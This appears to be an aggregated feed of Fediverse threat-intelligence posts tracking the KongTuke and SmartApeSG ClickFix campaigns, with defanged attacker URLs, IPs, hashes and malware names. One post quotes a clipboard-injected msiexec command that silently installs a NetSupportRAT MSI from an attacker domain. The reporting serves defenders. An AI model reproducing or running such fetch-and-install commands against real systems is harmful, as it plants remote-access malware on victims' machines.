home.social

#kongtuke — Public Fediverse posts

Live and recent posts from across the Fediverse tagged #kongtuke, aggregated by home.social.

fetched live
  1. KongTuke Hackers Exploit Microsoft Teams for Rapid Corporate Breaches

    KongTuke hackers have found a lightning-fast way to breach corporations, exploiting Microsoft Teams to go from initial contact to persistent foothold in under five minutes. This alarming new tactic is part of KongTuke's evolving social engineering toolkit, complementing its previous web-based attacks.

    osintsights.com/kongtuke-hacke

    #MicrosoftTeams #Kongtuke #SocialEngineering #InitialAccessBroker #EmergingThreats

  2. i've got a new malware analysis describing what i have dubbed XorBee RAT

    • delivered by #kongtuke via #clickfix
    • Python based
    • targets domain-joined Windows
    • uses port tcp/4444 for C2 traffic
    • obfuscates C2 traffic with XOR of the letter b
    • continuously runs a thread checking for monitoring tools and exists if seen
    • after authenticating with C2, enters reverse shell
    • related to ModeloRAT
    • first seen in October 2025

    rmceoin.github.io/malware-anal

    #xorbee

  3. 2026-04-09 (Thursday): Finally got the #KongTuke CAPTCHA page and associated #ClickFix instructions today!

    KongTuke CAPTCHA page traffic:

    - hxxps[:]//windlrr[.]com/file.js
    - hxxps[:]//windlrr[.]com/t
    - hxxps[:]//windlrr[.]com/g
    - hxxps[:]//windlrr[.]com/g
    - hxxps[:]//windlrr[.]com/c?tk=a19806998b1234b63f73ef741e1b749d

    URL from clipboard-injected script:

    - hxxps[:]//oeannon[.]com/t2?tk=5f7edb3752dd5b85eda86711724abd44

    Last URL I got on a VM (nothing returned):

    - hxxps[:]//plein-soleil[.]top/o

  4. 2026-04-09 (Thursday): I found a site with inject script for both the #KongTuke and #SmartApeSG campaigns. Only got #SmartApeSG

    Zip archive payload: c0d91df99b279ebfd952dadf0d1b94e436defa6bb59752cfad13777187f88553

    Saw the same possible data exfiltration traffic to the same server at 89.110.110[.]119:443 that I saw from the previous payload from SmartApeSG campaign I reported on Monday 2026-04-06.

  5. NOTE: This has been updated to correct the malware names. Thanks, @netresec!

    2026-02-02 (Monday) #KongTuke #ClickFix activity leads to #MintsLoader and #GhostWeaver #RAT

    Today, the ClickFix text uses the "finger" command, which is a tactic used by KongTuke and other ClickFix campaigns in previous weeks/months.

    A #pcap of the infection traffic, some artifacts, and further details are available at malware-traffic-analysis.net/2

  6. 📣 🚨 #KongTuke hacker group cloned a #Chrome ad blocker to trick users into installing spyware which also launched DoS attacks, crashed browsers, and dropped ModeloRAT.

    Read: hackread.com/clickfix-crashfix

    #CyberSecurity #Malware #ModeloRAT #ClickFix #CrashFix

  7. 2026-01-08 (Thursday): Got a full infection from #KongTuke campaign #ClickFix activity today.

    I split the traffic from this infection into two #pcap files, and the second one is over 200 MB, because of the malware download.

    Pcap files, the associated malware, artifacts, and further information is available at malware-traffic-analysis.net/2

  8. 2026-01-05 (Monday): #KongTuke domain scrroeder[.]com generated #ClickFix script for 144.31.221[.]71, but I didn't get a malware infection when I tried it today.

  9. I finished compiling the information for #Kongtuke #ClickFix activity using the finger command on 2025-12-11, and it's now live at www.malware-traffic-analysis.net/2025/12/11/index2.html

    I'd already posted the #SmartApeSG ClickFix activity using finger that same day, so now both are available.

    I had to run the ClickFix command on a physical host because the C2 server didn't like me when I initially tried it on a VM.

    Post-infection traffic looks like the same type of #AsyncRAT I've seen before, and some Tor traffic from whatever the follow-up malware is.

    It's a 221 MB zip archive containing the #pcap for the full infection, and it's about the same size as the zip archive containing forensic artifacts from the infected host.

  10. 2025-11-18: #KongTuke activity using #ClickFix

    [compromised site]
    -->
    hxxps[:]//apraadhi[.]com/6h9k.js
    -->
    hxxps[:]//apraadhi[.]com/js.php?device=windows&ip=[base64 text]&refferer=[base64 text]&browser=[base64 text]&ua=[base64 text]&loc=VVM=&is_ajax=1
    -->
    hxxp[:]//69.67.172[.]194:6655/ab
    -->
    hxxp[:]//69.67.172[.]194:6655/se

    Info also at github.com/malware-traffic/ind

    Info on KongTuke infection chain from yesterday at isc.sans.edu/diary/KongTuke+ac

  11. 2025-10-08 (Wednesday): #Kongtuke campaign fake CAPTCHA page with #ClickFix instructions.

    I got a full infection chain this time!

    During this infection I saw a 205MB zip download, which makes the #pcap take a while to load in Wireshark.

    Some IOCs with the associated #malware and artifacts are available at malware-traffic-analysis.net/2

  12. 2025-09-22 (Monday): #SmartApeSG using #FileFix style #ClickFix technique on its fake CAPTCHA page.

    While #KongTuke has reportedly used FileFix, this is the first time I've seen it from SmartApeSG sites.

    #clipboardhijacking Script injected into clipboard:

    msiexec /i hxxps[:]//founderevo[.]com/res/velvet ISLANDABSTRACT=surgewarfare.bat /qn

    The downloaded file is an MSI for #NetSupportRAT

    virustotal.com/gui/file/958586

  13. 2025-09-03 (Wednesday): #Kongtuke injected script leads to fake CAPTCHA page.

    The fake CAPTCHA page provides #ClickFix style instructions to run a malicious command/script for #LummaStealer

    Clipboard hijacking (pastejacking) at its finest!

    A #pcap of the infection traffic, the associated malware, and a list of indicators are at malware-traffic-analysis.net/2

  14. 2025-08-20 (Wed): #Kongtuke still using #FileFix style #ClickFix instructions on its fake CAPTCHA pages.

    I never got any further than the HTTP POST request that sends information about the infected system host.

    Details at: github.com/malware-traffic/ind

  15. 2025-08-12 (Tuesday): I saw ichmidt[.]com/6t4r.js in injected script for #Kongtuke

    No luck on getting any further in the infection chain.

    Can pivot on that domain in URLscan to find compromised sites: urlscan.io/search/#ichmidt.com

    cc: @monitorsg

  16. Example 2: #FileFix

    As of 2025-07-03, the #KongTuke campaign is using FileFix style #ClickFix pages to distribute whatever this campaign is distributing.

    It's likely pushing #InterlockRAT based on previous discussions I've had here, but I couldn't confirm, because it didn't like me.

  17. @crep1x i don't see a direct common artifact from the IOCs shared, but this looks just like #KongTuke

  18. Social media post I wrote for my employer on other platforms.

    2025-04-04 (Friday): Injected #KongTuke script in pages from legitimate but compromised websites leads to fake #CAPTCHA style pages and #ClipboardHijacking (#pastejacking). These pages ask users to paste script into a Run window. Latest info at

    Information from an infection run earlier today at github.com/PaloAltoNetworks/Un

    Of note, we can find legitimate websites with the injected hashtag#KongTuke script by pivoting on the KongTuke domain in URLscan:

    urlscan.io/search/#lancasternh

  19. 025-01-28 (Tuesday): A case of web injects--malicious script injected into compromised websites. In this example, a compromised site has two instances of injected script.

    One inject script is #KongTuke that leads to a fake CAPTCHA page, which is something that I and many others have discussed previously.

    The other injected script leads to a #SocGholish style fake browser update page.

    For a#pcap of the infection traffic, malware and other files from the activity, and the indicators of compromise (IOCs), see malware-traffic-analysis.net/2